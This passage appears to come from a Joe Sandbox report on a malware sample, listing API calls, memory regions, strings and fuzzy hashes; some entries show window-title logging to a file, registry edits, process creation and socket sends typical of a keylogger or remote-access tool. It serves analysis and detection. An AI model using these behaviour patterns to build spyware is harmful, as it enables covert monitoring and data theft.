                                          • Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: _sprintf
                                          • String ID: %2d%c$%c%c%c$%s%5d$-- $--%c$xFl
                                          • API String ID: 1467051239-3993000603
                                          • Opcode ID: 22ac9817bf373efdb67811e54d1062d39bbd827489030770dc8204aa9cdf8fdc
                                          • Instruction ID: c08413ba672dc234b846266dda55f89486d97414ce984bdf1f3277f2863bacfe
                                          • Opcode Fuzzy Hash: 22ac9817bf373efdb67811e54d1062d39bbd827489030770dc8204aa9cdf8fdc
                                          • Instruction Fuzzy Hash: 6DA13872E006548BDB20DF6ACC91BEDB3B5FF4A318F100156D8D99BE48DB3548868F56
                                          APIs
                                          • RegOpenKeyExW.ADVAPI32(80000001,AppEvents,00000000,00000002,?), ref: 03D97559
                                          • RegDeleteValueW.ADVAPI32(?), ref: 03D97564
                                          • RegCloseKey.ADVAPI32(?), ref: 03D97574
                                          • RegCreateKeyW.ADVAPI32(80000001,AppEvents,?), ref: 03D97593
                                          • lstrlenW.KERNEL32(?), ref: 03D975A1
                                          • RegSetValueExW.ADVAPI32(?,?,00000000,00000003,?,00000000), ref: 03D975B4
                                          • RegCloseKey.ADVAPI32(?,?,00000000,00000003,?,00000000), ref: 03D975C2
                                          • RegCloseKey.ADVAPI32(?), ref: 03D975D0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Close$Value$CreateDeleteOpenlstrlen
                                          • String ID: AppEvents$Network
                                          • API String ID: 3935456190-3733486940
                                          • Opcode ID: d656a0c173989ad9828e9ff3b9a0d97ccebb88e1a9d09a5e22a2f155bab32f20
                                          • Instruction ID: 5c8f500239abf148fd4cd198082d6b7ad55ba6fd60ad5c1ae8b136a589aa5f63
                                          • Opcode Fuzzy Hash: d656a0c173989ad9828e9ff3b9a0d97ccebb88e1a9d09a5e22a2f155bab32f20
                                          • Instruction Fuzzy Hash: 0F113076600208FBE750DBA5EC49FABB37CEB05711F140559FA01D7340D6719E10D7A4
                                          APIs
                                          • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,905EEAA6,00000000,?,00000000,02F061BF,00000000), ref: 02F05A55
                                          • InitializeCriticalSectionAndSpinCount.KERNEL32(02F0631F,00000000), ref: 02F05AF4
                                          • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 02F05B32
                                          • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 02F05B57
                                          • InitializeCriticalSectionAndSpinCount.KERNEL32(02F063BF,00000000), ref: 02F05C4F
                                          • InitializeCriticalSectionAndSpinCount.KERNEL32(02F063D7,00000000), ref: 02F05C70
                                          • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 02F05B7C
                                            • Part of subcall function 02F01280: __CxxThrowException@8.LIBCMT ref: 02F01290
                                            • Part of subcall function 02F01280: DeleteCriticalSection.KERNEL32(00000000,00000000,02F17DF8,?,?,02F06541), ref: 02F012A1
                                          • InterlockedExchange.KERNEL32(02F061D7,00000000), ref: 02F05CE1
                                          • timeGetTime.WINMM ref: 02F05CE7
                                          • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 02F05CFB
                                          • CreateEventW.KERNEL32(00000000,00000000,00000000,00000000), ref: 02F05D04
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                          • Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: CreateEvent$CriticalSection$CountInitializeSpin$DeleteException@8ExchangeInterlockedThrowTimetime
                                          • String ID:
                                          • API String ID: 1400036169-0
                                          • Opcode ID: d0a1e2cedc43345d431e6ebe0205d09068220885f9791c2f80c61893c12e279a
                                          • Instruction ID: 4a9f441f3b0ebfcc4684d0cb2ffc34afb87fab2eaa8bca9ded5e9ed5a1615f7d
                                          • Opcode Fuzzy Hash: d0a1e2cedc43345d431e6ebe0205d09068220885f9791c2f80c61893c12e279a
                                          • Instruction Fuzzy Hash: 98A1F5B0A01A4AAFD714DF6AC8C479AFBE8FB08344F90462EE11DD7640D774A964DF90
                                          APIs
                                          • SetLastError.KERNEL32(0000139F,90594F2A,?,?,?,?,00000000,000000FF,00000000), ref: 03D84CC6
                                          • EnterCriticalSection.KERNEL32(?,90594F2A,?,?,?,?,00000000,000000FF,00000000), ref: 03D84CED
                                          • SetLastError.KERNEL32(0000139F,?,?,00000000,000000FF), ref: 03D84D01
                                          • LeaveCriticalSection.KERNEL32(?,?,?,00000000,000000FF), ref: 03D84D08
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CriticalErrorLastSection$EnterLeave
                                          • String ID:
                                          • API String ID: 2124651672-0
                                          • Opcode ID: eb6e9ee6c66cf46b5e44044571cdcaeaf81690beddd37d4757eb08f978f0c79c
                                          • Instruction ID: ec43202bea9f62a6f47370caad274405a4769465b1ca049853e2adb00ef8d8c4
                                          • Opcode Fuzzy Hash: eb6e9ee6c66cf46b5e44044571cdcaeaf81690beddd37d4757eb08f978f0c79c
                                          • Instruction Fuzzy Hash: E151AD77A04305CFD714EF69D885B6AB7B4FF48B11F000A6EE55AC7740E735A5008BA1
                                          APIs
                                          • SetLastError.KERNEL32(0000139F,905EEAA6,?,?,?,?,00000000,000000FF,00000000), ref: 02F04CB6
                                          • EnterCriticalSection.KERNEL32(?,905EEAA6,?,?,?,?,00000000,000000FF,00000000), ref: 02F04CDD
                                          • SetLastError.KERNEL32(0000139F,?,?,00000000,000000FF), ref: 02F04CF1
                                          • LeaveCriticalSection.KERNEL32(?,?,?,00000000,000000FF), ref: 02F04CF8
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                          • Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: CriticalErrorLastSection$EnterLeave
                                          • String ID:
                                          • API String ID: 2124651672-0
                                          • Opcode ID: 05f6082c98f7104047cb3fbe89dfafa17e08b91f31fe0b6b323651eb9fa34a7d
                                          • Instruction ID: 03a96266d674ed1064192d8ec3a668f23f34314c20f91a88549d97835d851ff5
                                          • Opcode Fuzzy Hash: 05f6082c98f7104047cb3fbe89dfafa17e08b91f31fe0b6b323651eb9fa34a7d
                                          • Instruction Fuzzy Hash: 6A51D076A446059FD320DFA8E985B6AF7F4FF88741F40492EEA0AD7780D731B8108B90
                                          APIs
                                          • __floor_pentium4.LIBCMT ref: 6C37BF27
                                          • __floor_pentium4.LIBCMT ref: 6C37BF7B
                                          • __floor_pentium4.LIBCMT ref: 6C37BF92
                                          • __floor_pentium4.LIBCMT ref: 6C37BF3E
                                            • Part of subcall function 6C3F6320: ___libm_error_support.LIBCMT ref: 6C3F63D5
                                          • __floor_pentium4.LIBCMT ref: 6C37BFAD
                                          • __floor_pentium4.LIBCMT ref: 6C37BFC7
                                          • __floor_pentium4.LIBCMT ref: 6C37BFDB
                                          • __floor_pentium4.LIBCMT ref: 6C37BFF2
                                          • __floor_pentium4.LIBCMT ref: 6C37C024
                                          • __floor_pentium4.LIBCMT ref: 6C37C048
                                          • __floor_pentium4.LIBCMT ref: 6C37C06C
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true
                                          • Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: __floor_pentium4$___libm_error_support
                                          • String ID:
                                          • API String ID: 190838090-0
                                          • Opcode ID: b0eaf1d7a93bf012a4ef6ada29ee814af41e672dc0f08f201e0f3c1cbf5e638a
                                          • Instruction ID: f0a70922f8a1d2fe7b4b7e1afbda4556859c62385be598f48ed39091c1664cd5
                                          • Opcode Fuzzy Hash: b0eaf1d7a93bf012a4ef6ada29ee814af41e672dc0f08f201e0f3c1cbf5e638a
                                          • Instruction Fuzzy Hash: 48417B70A04E0AD2DF14BF62E8494EEBF74FF8A754F92098AD0E5515A0CF3A04B9C746
                                          APIs
                                          • _sprintf.LIBCMT ref: 6C361F2C
                                          • _sprintf.LIBCMT ref: 6C361FBF
                                          • _sprintf.LIBCMT ref: 6C36203C
                                            • Part of subcall function 6C3714FC: TextOutA.GDI32(-00000005,00000017,?,00000001,00000001), ref: 6C3715C4
                                            • Part of subcall function 6C3714FC: EndPage.GDI32(00000000), ref: 6C371684
                                            • Part of subcall function 6C3714FC: StartPage.GDI32 ref: 6C371690
                                            • Part of subcall function 6C3714FC: SetMapMode.GDI32(00000008), ref: 6C37169E
                                            • Part of subcall function 6C3714FC: SetViewportOrgEx.GDI32(00000000,00000000,00000000), ref: 6C3716AD
                                            • Part of subcall function 6C3714FC: GetDeviceCaps.GDI32(0000000A,00000000), ref: 6C3716BC
                                            • Part of subcall function 6C3714FC: GetDeviceCaps.GDI32(00000008,00000000), ref: 6C3716C7
                                            • Part of subcall function 6C3714FC: SetViewportExtEx.GDI32(00000000,?,00000000), ref: 6C3716D0
                                            • Part of subcall function 6C3714FC: SetWindowOrgEx.GDI32(00000000,00000000,00000000), ref: 6C3716DF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true
                                          • Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: _sprintf$CapsDevicePageViewport$ModeStartTextWindow
                                          • String ID: $%.3s:%3d$%s:%3d$No aspects in list.$Sum power: %.2f - Average power: %.2f$Y
                                          • API String ID: 2093457147-2556395577
                                          • Opcode ID: 25768d9b959374d40ca33722facfae8b4875e9fada1f86622c3d99592f781bac
                                          • Instruction ID: cc825c4fe4cea67b4ecf8ef4c8f9044b07db77c66c4b82f1bd57e2e6c7ad3320
                                          • Opcode Fuzzy Hash: 25768d9b959374d40ca33722facfae8b4875e9fada1f86622c3d99592f781bac
                                          • Instruction Fuzzy Hash: 3841B172D00288CBDB10EFE6C954ADCB778AF04318F504529D4996FE48CB79D859CF66
                                          APIs
                                          • lstrlenW.KERNEL32(?), ref: 03D9765D
                                          • _memmove.LIBCMT ref: 03D9768F
                                          • _wcsrchr.LIBCMT ref: 03D97697
                                            • Part of subcall function 03D89180: LoadLibraryW.KERNEL32(wininet.dll), ref: 03D891C3
                                            • Part of subcall function 03D89180: GetProcAddress.KERNEL32(00000000,InternetOpenW), ref: 03D891D7
                                            • Part of subcall function 03D89180: FreeLibrary.KERNEL32(00000000), ref: 03D891F7
                                          • GetFileAttributesW.KERNEL32(-00000002), ref: 03D976B6
                                          • GetLastError.KERNEL32 ref: 03D976C1
                                          • _memset.LIBCMT ref: 03D976D4
                                          • CreateProcessW.KERNEL32(00000000,-00000002,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 03D97701
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: Library$AddressAttributesCreateErrorFileFreeLastLoadProcProcess_memmove_memset_wcsrchrlstrlen
                                          • String ID: D$WinSta0\Default
                                          • API String ID: 4287160851-1101385590
                                          • Opcode ID: f1ff3c1dbc1770986cc57133d15ab805d0efd9f646d0efc75fd7d475d06fb634
                                          • Instruction ID: 01bd2fcf2d752d6783ecb0dd54e6294164777d35645c7e4ac95b3fdfb75ace94
                                          • Opcode Fuzzy Hash: f1ff3c1dbc1770986cc57133d15ab805d0efd9f646d0efc75fd7d475d06fb634
                                          • Instruction Fuzzy Hash: 65110DB7900208A7EB21E6A4AC85FBF776DDF85B10F14052AFA06DE284F675950583F2
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3623600753.000000006C351000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C350000, based on PE: true
                                          • Associated: 00000006.00000002.3623582983.000000006C350000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623659645.000000006C3FD000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623695592.000000006C447000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623715559.000000006C449000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623742172.000000006C46D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623760984.000000006C46E000.00000008.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C470000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C473000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C478000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C47E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623779733.000000006C480000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 00000006.00000002.3623887245.000000006C483000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_6c350000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: _sprintf$__floor_pentium4
                                          • String ID: %02d"$%10.6f$%3d%c%02d'$%7.3f
                                          • API String ID: 175470247-3464643819
                                          • Opcode ID: 0c600146d141c0d2b3b67f07016871ed5066364859e33a576ffe2d8687bc6172
                                          • Instruction ID: e1bc0372ac9fa1a550321bdfcba4753d8f548b1c6e1b02ca389d866861bfdadf
                                          • Opcode Fuzzy Hash: 0c600146d141c0d2b3b67f07016871ed5066364859e33a576ffe2d8687bc6172
                                          • Instruction Fuzzy Hash: FA2122B2511849E7CF10AF62E80DFED7F78EB06309F114699F09540880CB3A85A8CB77
                                          APIs
                                          • _memset.LIBCMT ref: 03D992F1
                                          • GetForegroundWindow.USER32(?,74DF23A0,00000000), ref: 03D992F9
                                          • GetWindowTextW.USER32(00000000,03DC3B10,00000800), ref: 03D9930F
                                          • _memset.LIBCMT ref: 03D9932D
                                          • lstrlenW.KERNEL32(03DC3B10,?,?,?,?,74DF23A0,00000000), ref: 03D9934C
                                          • GetLocalTime.KERNEL32(?,?,?,?,?,74DF23A0,00000000), ref: 03D9935D
                                          • wsprintfW.USER32 ref: 03D993A4
                                            • Part of subcall function 03D99250: WaitForSingleObject.KERNEL32(?,000000FF,00000000,?,?,03D993B5,?,?,?,?,74DF23A0,00000000), ref: 03D9925D
                                            • Part of subcall function 03D99250: CreateFileW.KERNEL32(03DC31A0,40000000,00000002,00000000,00000004,00000002,00000000,?,?,03D993B5,?,?,?,?,74DF23A0,00000000), ref: 03D99277
                                            • Part of subcall function 03D99250: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 03D99292
                                            • Part of subcall function 03D99250: lstrlenW.KERNEL32(?,00000000,00000000), ref: 03D9929F
                                            • Part of subcall function 03D99250: WriteFile.KERNEL32(00000000,?,00000000), ref: 03D992AA
                                            • Part of subcall function 03D99250: CloseHandle.KERNEL32(00000000), ref: 03D992B1
                                            • Part of subcall function 03D99250: ReleaseMutex.KERNEL32(?), ref: 03D992BE
                                          • _memset.LIBCMT ref: 03D993C0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: File_memset$Windowlstrlen$CloseCreateForegroundHandleLocalMutexObjectPointerReleaseSingleTextTimeWaitWritewsprintf
                                          • String ID: [
                                          • API String ID: 2192163267-4056885943
                                          • Opcode ID: a3edf2dedf4445889d0e243686a5b2f0dc8155b6cc0b2f020dbeadd687f30a2e
                                          • Instruction ID: 4e2c45afefccb0e62a4b995b6834ab1d0659cf8c79ae80466d531f8ed796915b
                                          • Opcode Fuzzy Hash: a3edf2dedf4445889d0e243686a5b2f0dc8155b6cc0b2f020dbeadd687f30a2e
                                          • Instruction Fuzzy Hash: 5A21EA76E20219EAC750EF64DC45BAE77F9FF44700F00C599F88496280EE745999CBE0
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622375709.00000000032B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 032B0000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_32b0000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: _memset
                                          • String ID: !jWW$.$_$i$l${vU_
                                          • API String ID: 2102423945-3065862289
                                          • Opcode ID: 6ccc7fd15bb1100c1fb6edbf5c978d90db860b83903a5ad30d142e73f1fe8078
                                          • Instruction ID: 92e0964ec2f9e3f0809040cd7fc79c5c02f0ee2ca514c4611dd40238b798d0a2
                                          • Opcode Fuzzy Hash: 6ccc7fd15bb1100c1fb6edbf5c978d90db860b83903a5ad30d142e73f1fe8078
                                          • Instruction Fuzzy Hash: EC217A74A407689ED720DF54CC80FAABBB9EF86700F1481CAE54CAA651D7B19A84CF52
                                          APIs
                                          • EnterCriticalSection.KERNEL32(?,?,?,?,03D8395D,?,00000000,000000FF,00000000), ref: 03D83DD5
                                          • LeaveCriticalSection.KERNEL32(?,?,?,03D8395D,?,00000000,000000FF,00000000), ref: 03D83E20
                                          • send.WS2_32(?,000000FF,00000000,00000000), ref: 03D83E3E
                                          • EnterCriticalSection.KERNEL32(?), ref: 03D83E51
                                          • LeaveCriticalSection.KERNEL32(?), ref: 03D83E64
                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,03D8395D,?,00000000,000000FF,00000000), ref: 03D83E8C
                                          • WSAGetLastError.WS2_32(?,?,03D8395D,?,00000000,000000FF,00000000), ref: 03D83E97
                                          • EnterCriticalSection.KERNEL32(?,?,?,03D8395D,?,00000000,000000FF,00000000), ref: 03D83EAB
                                          • LeaveCriticalSection.KERNEL32(?), ref: 03D83EE4
                                          • HeapFree.KERNEL32(00000000,00000000,?), ref: 03D83F21
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CriticalSection$EnterLeave$FreeHeap$ErrorLastsend
                                          • String ID:
                                          • API String ID: 1701177279-0
                                          • Opcode ID: 7c80f71ab17848da4c159b0c05a86be8678b5b7a02532fc2195ceb5e61c6d434
                                          • Instruction ID: 6de5f96dca74967267f540879ffb2d58d7b48113ebc031072e96e4a703cfbbc3
                                          • Opcode Fuzzy Hash: 7c80f71ab17848da4c159b0c05a86be8678b5b7a02532fc2195ceb5e61c6d434
                                          • Instruction Fuzzy Hash: 1841187A504704DBC725EF78D888AA7B7E8FB49B00F044A6DE9AECB254E731F5418B50
                                          APIs
                                          • EnterCriticalSection.KERNEL32(?,?,?,?,02F0397D,?,00000000,000000FF,00000000), ref: 02F03DF5
                                          • LeaveCriticalSection.KERNEL32(?,?,?,02F0397D,?,00000000,000000FF,00000000), ref: 02F03E40
                                          • send.WS2_32(?,000000FF,00000000,00000000), ref: 02F03E5E
                                          • EnterCriticalSection.KERNEL32(?), ref: 02F03E71
                                          • LeaveCriticalSection.KERNEL32(?), ref: 02F03E84
                                          • HeapFree.KERNEL32(00000000,00000000,?,?,?,02F0397D,?,00000000,000000FF,00000000), ref: 02F03EAC
                                          • WSAGetLastError.WS2_32(?,?,02F0397D,?,00000000,000000FF,00000000), ref: 02F03EB7
                                          • EnterCriticalSection.KERNEL32(?,?,?,02F0397D,?,00000000,000000FF,00000000), ref: 02F03ECB
                                          • LeaveCriticalSection.KERNEL32(?), ref: 02F03F04
                                          • HeapFree.KERNEL32(00000000,00000000,?), ref: 02F03F41
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                          • Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: CriticalSection$EnterLeave$FreeHeap$ErrorLastsend
                                          • String ID:
                                          • API String ID: 1701177279-0
                                          • Opcode ID: 148e1964f84adc6e0225d8d0003ccf5ab731ad3101127699792af38a8e3a3726
                                          • Instruction ID: 2355ad9e2d7f80e3378631bd12af0c22c994355e4e9a1f150b49283b2e454b93
                                          • Opcode Fuzzy Hash: 148e1964f84adc6e0225d8d0003ccf5ab731ad3101127699792af38a8e3a3726
                                          • Instruction Fuzzy Hash: 5E412971A046059FC724CFB4D8C8BA7BBF9BB49384F85496DEA5ECB280D731A405DB60
                                          APIs
                                          • WSASetLastError.WS2_32(0000000D,00000000,000000FF,00000000,000000FF,00000000), ref: 03D84F43
                                          • EnterCriticalSection.KERNEL32(000002FF,00000000,000000FF,00000000,000000FF,00000000), ref: 03D84F58
                                          • WSASetLastError.WS2_32(00002746), ref: 03D84F6A
                                          • LeaveCriticalSection.KERNEL32(000002FF), ref: 03D84F71
                                          • timeGetTime.WINMM ref: 03D84F9F
                                          • timeGetTime.WINMM ref: 03D84FC7
                                          • SetEvent.KERNEL32(?), ref: 03D85005
                                          • InterlockedExchange.KERNEL32(?,00000001), ref: 03D85011
                                          • LeaveCriticalSection.KERNEL32(000002FF), ref: 03D85018
                                          • LeaveCriticalSection.KERNEL32(000002FF), ref: 03D8502B
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622934207.0000000003D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 03D80000, based on PE: true
                                          • Associated: 00000006.00000002.3622934207.0000000003DC6000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_3d80000_Fj0RhXL.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: CriticalSection$Leave$ErrorLastTimetime$EnterEventExchangeInterlocked
                                          • String ID:
                                          • API String ID: 1979691958-0
                                          • Opcode ID: 6cd049ae1dc337c721e26ff8a976f6df13da73a70a2bc18cc492767b5c2455d6
                                          • Instruction ID: 4fac666edd2af302bc93d26e09bed5072f3ba20d8ff47cd6659be710da8a8a9a
                                          • Opcode Fuzzy Hash: 6cd049ae1dc337c721e26ff8a976f6df13da73a70a2bc18cc492767b5c2455d6
                                          • Instruction Fuzzy Hash: C041CF32600301DBD720EF6AD848A6AB7F9FB45B25F084998E58AC7351E735F5408B51
                                          APIs
                                          • WSASetLastError.WS2_32(0000000D,00000000,000000FF,00000000,000000FF,00000000), ref: 02F04F33
                                          • EnterCriticalSection.KERNEL32(000002FF,00000000,000000FF,00000000,000000FF,00000000), ref: 02F04F48
                                          • WSASetLastError.WS2_32(00002746), ref: 02F04F5A
                                          • LeaveCriticalSection.KERNEL32(000002FF), ref: 02F04F61
                                          • timeGetTime.WINMM ref: 02F04F8F
                                          • timeGetTime.WINMM ref: 02F04FB7
                                          • SetEvent.KERNEL32(?), ref: 02F04FF5
                                          • InterlockedExchange.KERNEL32(?,00000001), ref: 02F05001
                                          • LeaveCriticalSection.KERNEL32(000002FF), ref: 02F05008
                                          • LeaveCriticalSection.KERNEL32(000002FF), ref: 02F0501B
                                          Memory Dump Source
                                          • Source File: 00000006.00000002.3622068823.0000000002F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 02F00000, based on PE: true
                                          • Associated: 00000006.00000002.3622068823.0000000002F1F000.00000040.00001000.00020000.00000000.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_6_2_2f00000_Fj0RhXL.jbxd
                                          Similarity
                                          • API ID: CriticalSection$Leave$ErrorLastTimetime$EnterEventExchangeInterlocked
                                          • String ID:
                                          • API String ID: 1979691958-0
                                          • Opcode ID: 6cb7d25eaa55de57b915cac20292b8b5b0f28d5c43023bce572565a300144876
